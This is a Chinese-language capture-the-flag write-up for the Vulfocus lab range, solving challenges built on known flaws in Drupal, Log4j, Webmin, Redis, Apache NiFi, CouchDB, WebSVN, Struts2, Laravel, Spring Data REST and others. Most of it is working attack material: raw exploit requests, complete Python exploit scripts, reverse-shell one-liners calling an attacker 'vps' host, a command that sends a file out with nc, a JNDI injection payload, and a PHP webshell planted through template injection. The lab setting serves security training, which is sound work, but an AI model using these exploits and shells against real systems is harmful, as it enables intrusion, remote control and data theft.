Vulfocus靶场部分Wp
bgbingsec 1044天前作者:givemefivw@上海观安信息技术股份有限公司
声明:本文提及的工具仅用于对已授权的目标进行测试,请自行学习网络安全法,因使用本文提供的思路造成的损失,本文作者及工具的作者、白帽汇均不承担责任。继续阅读意味着您理解并同意本声明。
038 Drupal
打开靶场,得到信息Powered by Drupal:
访问user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax目录
说明可能存在CVE-2018-7600
抓包修改数据:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 106.75.119.109:51572
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xm l,application/xm l;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sjigddfdaehhpom7vrqp7gc7o3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Type: application/x-www-form-urlencoded
Content-Length: 621
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
ls /tmp
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
得到flag:flag-{bmh47f9f13a-1a64-4881-a952-8af433bde8d4}
062 Log4j
启动靶场,在页面抓包
在VPS启动JNDI工具
POST /hello HTTP/1.1
Host: 106.75.119.109:19542
Content-Length: 68
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Origin: <http://106.75.100.72:61111>
cmd:ls /tmp
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xm l,application/xm l;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: <http://106.75.119.109:19542>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
payload=${jndi:ldap://vps:1389/TomcatBypass/TomcatEcho}
得到flag
045 Webmin
无需登陆,使用脚本直接拿flag
完整数据包:
POST /password_change.cgi HTTP/1.1
Host: 106.75.119.109:50093
CAccept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: <https://106.75.119.109:50093/session_login.cgi>
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
user=rootxx&pam=&expired=2&old=test|ls /tmp&new1=test2&new2=test2&=
注意这里两个flag,使用第一个。
27 redis
看到端口映射信息:6379:11230
redis未授权
利用主从复制拿到Shell
下载两个脚本:
```java
<https://github.com/n0b0dyCN/redis-rogue-server>
<https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server>
将 redis-rogue-server的exp.so文件复制到 Awsome文件夹中使用,因为exp.so带 system模块
1、开启监听——nc -lvnp 9999
2、攻击机开启主服务器——python3 redis_rogue_server.py -v -path exp.so
然后靶机执行:
```java
config set dir /tmp
//一般tmp目录都有写权限,所以选择这个目录写入
config set dbfilename exp.so
//设置导出文件的名字 这里就是创建一个空文件
slaveof vps 15000
//进行主从同步,将恶意so文件写入到tmp文件
//端口可以自定义
然后加载恶意so文件
module load ./exp.so
//加载写入的so文件模块
module list
//ັ查看恶意的so文件有没有写入成功
反弹Shell:system.rev vps 9999
70 nodejs(方法是其他大佬提供的)
http://106.75.119.109:28589/api/getServices?name[]=$(find%20/%20-name%20%22*flag*%22%20%3E%201.txt)
http://106.75.119.109:28589/api/getServices?name[]=$(nc%20vps%202333%20%3C%201.txt)
48 phpok CVE-2018-12491任意文件上传
打开靶场
搜索历史漏洞,找到CVE-2018-12491任意文件上传:
https://blog.csdn.net/weixin_42582241/article/details/104593164#:~:text=%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0%EF%BC%9Aphp,%EF%BC%8C%E8%8E%B7%E5%8F%96%E7%BD%91%E7%AB%99%E6%9D%83%E9%99%90%E3%80%82
32 JunAMS CNVD-2020-24741文件上传
https://blog.csdn.net/YouthBelief/article/details/121403512
41 Nifi Api 远程代码执行
搜索历史漏洞,找到此处:
https://github.com/freeFV/CVE-2020/blob/main/Apache%20NiFi%20Api%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(RCE).md
import sys
import json
import requests as req
class Exp:
def __init__(self, url):
self.url = url
def check_is_vul(self):
url = self.url + "/nifi-api/access/config"
try:
res = req.get(url=url, verify=False)
data = res.json()
return not data["config"]["supportsLogin"]
except Exception as e:
pass
return False
def clean_up(self, p_id):
url = self.url + "/nifi-api/processors/" + p_id + "/run-status"
data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}
req.put(url=url, data=json.dumps(data), verify=False)
req.delete(url + "/threads", verify=False)
def exploit(self, cmd):
g_id = self.fetch_process_group()
if g_id:
p_id = self.create_process(g_id)
if p_id:
self.run_cmd(p_id=p_id, cmd=cmd)
self.clean_up(p_id=p_id)
def run_cmd(self, p_id, cmd):
url = self.url + "/nifi-api/processors/" + p_id
cmd = cmd.split(" ")
data = {
'component': {
'config': {
'autoTerminatedRelationships': ['success'],
'properties': {
'Command': cmd[0],
'Command Arguments': " ".join(cmd[1:]),
},
'schedulingPeriod': '3600 sec'
},
'id': p_id,
'state': 'RUNNING'
},
'revision': {'clientId': 'x', 'version': 1}
}
print(data)
headers = {
"Content-Type": "application/json",
}
res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()
def fetch_process_group(self):
url = self.url + "/nifi-api/process-groups/root"
try:
res = req.get(url=url, verify=False)
data = res.json()["id"]
return data
except Exception as e:
pass
return 0
def create_process(self, process_group_id):
url = self.url + "/nifi-api/process-groups/" + process_group_id + "/processors"
data = {
'component': {
'type': 'org.apache.nifi.processors.standard.ExecuteProcess'
},
'revision': {
'version': 0
}
}
headers = {
"Content-Type": "application/json",
}
try:
res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()["id"]
except Exception as e:
pass
return 0
if __name__ == '__main__':
if len(sys.argv) != 3:
print("rce.py url cmd")
else:
url = sys.argv[1] # <http://192.168.1.1:8080>
cmd = sys.argv[2] # nc -e /bin/bash 192.168.1.129 1234
e = Exp(url)
e.exploit(cmd)
脚本使用时注意目标后面不加/,或者直接修改代码。
python3 exp.py http://106.75.119.109:15961 "nc -e /bin/bash vps port"
44 Webmin(和45完全一样)
59 Couchdb CVE-2017-12636
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth
target = '<http://106.75.119.109:11374>'
command = rb"""sh -i >& /dev/tcp/vps/4433 0>&1"""
version = 1
session = requests.session()
session.headers = {
'Content-Type': 'application/json'
}
# session.proxies = {
# 'http': '<http://127.0.0.1:8085>'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
"type": "user",
"name": "wooyun",
"roles": ["_admin"],
"roles": [],
"password": "wooyun"
}''')
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
host = session.get(target + '/_membership').json()['all_nodes'][0]
session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')
if version == 1:
session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')
75 CVE-2021-32305 WebSVN 2.6.0 RCE
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/vps/7777 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
target = args.target
else:
print("[!] Target should start with either http:// or https://")
exit()
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
print("[*] Request send. Did you get what you wanted?")
参考:https://blog.csdn.net/weixin_43526443/article/details/121742277
17 YAPi 远程命令执行
https://www.jianshu.com/p/b1f79f346eca
22 St2-059
但是不知道是靶场问题还是什么原因,弹不了Shell
公开的exp:
import requests
url ="<http://ip>:port"
data1 = {
"id":"%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
"id":"%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload'))}"
}
res1 = requests.post(url,data=data1)
# print(res1.text)
res2 = requests.post(url,data=data2)
# print(res2.text)
payload需要编码:
bash -i >& /dev/tcp/vps/9967 0>&1
<http://www.jackson-t.ca/runtime-exec-payloads.html>
31 CVE-2021-3129 Laravel Debug mode RCE
下载phpggc:https://github.com/ambionics/phpggc
exp:
#!/usr/bin/python3
import requests as req
import os, uuid
class Exp:
__gadget_chains = {
"monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
"monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
"monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
} # phpggc链集合,暂时添加rce1后续再添加其他增强通杀能力
__delimiter_len = 8 # 定界符长度
def __vul_check(self):
resp = req.get(self.__url, verify=False)
if resp.status_code != 405 and "laravel" not in resp.text:
return False
return True
def __payload_send(self, payload):
header = {
"Accept": "application/json"
}
data = {
"solution": "Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "cve20213129",
"viewFile": ""
}
}
data["parameters"]["viewFile"] = payload
resp = req.post(self.__url, headers=header, json=data, verify=False)
# print(resp.text)
return resp
def __command_handler(self, command):
"""
因为用户命令要注入到payload生成的命令中,为了防止影响结构,所以进行一些处理。
"""
self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len] # 定界符用于定位页面中命令执行结果的位置。
# print(delimiter)
command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)
# print(command)
escaped_chars = [' ', '&', '|'] # 我只想到这么多,可自行添加。
for c in escaped_chars:
command = command.replace(c, '\\\\' + c)
# print(command)
return command
def __clear_log(self):
return self.__payload_send(
"php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
def __gen_payload(self, gadget_chain):
gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)
# print(gen_shell)
os.system(gen_shell)
with open('payload.txt', 'r') as f:
payload = f.read().replace('\\n', '') + 'a' # 添加一个字符使得两个完整的payload总是只有一个可以正常解码
os.system("rm payload.txt")
# print(payload)
return payload
def __decode_log(self):
return self.__payload_send(
"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
def __unserialize_log(self):
return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")
def __rce(self):
text = self.__unserialize_log().text
# print(text)
echo_find = text.find(self.__delimiter)
# print(echo_find)
if echo_find >= 0:
return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]
else:
return "[-] RCE echo is not found."
def exp(self):
for gadget_chain in self.__gadget_chains.keys():
print("[*] Try to use %s for exploitation." % (gadget_chain))
self.__clear_log()
self.__clear_log()
self.__payload_send('a' * 2)
self.__payload_send(self.__gen_payload(gadget_chain))
self.__decode_log()
print("[*] Result:")
print(self.__rce())
def __init__(self, target, command):
self.target = target
self.__url = req.compat.urljoin(target, "_ignition/execute-solution")
self.__command = self.__command_handler(command)
if not self.__vul_check():
print("[-] [%s] is seems not vulnerable." % (self.target))
print("[*] You can also call obj.exp() to force an attack.")
else:
self.exp()
def main():
Exp("<http://106.75.119.109:49216/>", "ls /tmp")
if __name__ == '__main__':
main()
把exp和phpggc放在同一目录下,py3执行
30 苹果cms
插入一句话(test.php 连接密码test):
<http://106.75.119.109:10343/index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A}>
24 CVE-2017-8046 Spring Data Rest RCE
扫描目录,发现存在http://106.75.119.109:49526/profile/persons目录
搜素相关漏洞
curl -X POST -i -H "Content-Type:application/json" -d '{"firstName":"Greg", "lastName":"Turnquist"}' <http://106.75.119.109:49526/persons>
访问persons/1页面抓包
修改请求方式为PATCH
PATCH /persons/1 HTTP/1.1
Host: 106.75.119.109:49526
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xm l,application/xm l;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sjigddfdaehhpom7vrqp7gc7o3; redirect=1; PHPSESSION=teujfkinrgs6ebhql3h7k49i30; thinkphp_show_page_trace=0|0; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE5LCJpYXQiOjE2NDA5MzM5NDcsImV4cCI6MTY0MTUzODc0N30.gOK1ez9e2w9ZtGO9IpoFBA12Ikhz22xwYMAb6F5C7Tg; _yapi_uid=19; JSESSIONID=CB81F834ADE3F7FFAD88A7357E3AC8D6; XSRF-TOKEN=eyJpdiI6IjBGN1gzeWVpR3ZwRDljQjVyYlNyV2c9PSIsInZhbHVlIjoieHpRSFV2cmRWZlpoQzRMYXEwcmIrT0JNSStydTBoUHFaYkZndW4vM2ZZZjhrTjVWazBZc0JEeXNpbGxvZjRXS1U2S1crY3pncVFsbGtycjAzT2Z2Q2ZBQWxta05oVDBJU050RkxiY3NnSlNGSThEUGNuZGR2ckJsa3ZqK3ZsREUiLCJtYWMiOiI2YWVlMWI1NTI1Yzk1N2M3NzljM2I1NjRkN2ViNTk3YTk2YTRiZGQyODFjYmZjYjY0Nzc3NWJhNmI0MmRhYzBlIn0%3D; laravel_session=eyJpdiI6ImRTeTVkOHVTMDk0c3AwQTNMUk1lb1E9PSIsInZhbHVlIjoiN1d4cXFiZlZUR2lEUGswQUhYeDhqamZHVGdyUmZJU1A1eTJjd3dQazlNVGpmcXIvbG56cnVPMTdpR3YrSW12SVp4UitYeE80d1ZJVVY1bGsyQlpkYSs3ZkJPNGhzTlJqUCsyVDN6SXJXWXoyZFMybS9TMU1Cd2wweEphUUVEajIiLCJtYWMiOiJjZDA5M2NhNTE0OTEzZWFhNDZiY2NmMjgyYjE2YTU5Nzg5ZmNhYjYzNmM5ZmU4MmM1MThkNTUzYmMwZTY2OTFjIn0%3D
Content-Type:application/json-patch+json
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 452
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname", "value": "vulhub" }]
其中payload字段反弹Shell转码后进行进制转换
payload = b'payload'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
vps开启监听,成功反弹
50 Nagios Core(未完成)
扫目录,扫到nagios
但是在网上只找到**CVE-2016-9565**
找到了一个Exp,但是py2环境,没有利用成功:https://www.bugku.com/thread-87-1-1.html
比赛总结
关于Wp
本篇Wp并不完善,仅将比赛过程中我自己拿过flag的都写了出来,另外又加了几个当时没来得及做的。因为最近项目比较忙,在闲暇中磨出来的,所以难免有些错漏和不足之处,还望各位师傅见谅。
比赛评价
除了比赛刚开始环境不稳和靶场开启上限之外,全程没有其他的痛点,所以总体我觉得比赛很可以的。就是最后的排名和我们的队名很有戏剧性。然后本次比赛综合来看是有点像比谁工具多,只要找到靶场的组件或者关键信息,就可以用工具直接打,有的还可以直接用goby扫。
些许建议
1、希望能在靶场的描述界面增加一个访问端口的描述,有些靶场一开启映射了好几个端口,还需要自己判断一下,如果能指点一下访问哪个端口映射的就方便多了。
2、另一个小想法就是能不能效仿这次比赛,在靶场中增加“盲打”模式,不告知靶场名称,需要自行收集。
昵称
邮箱
最新评论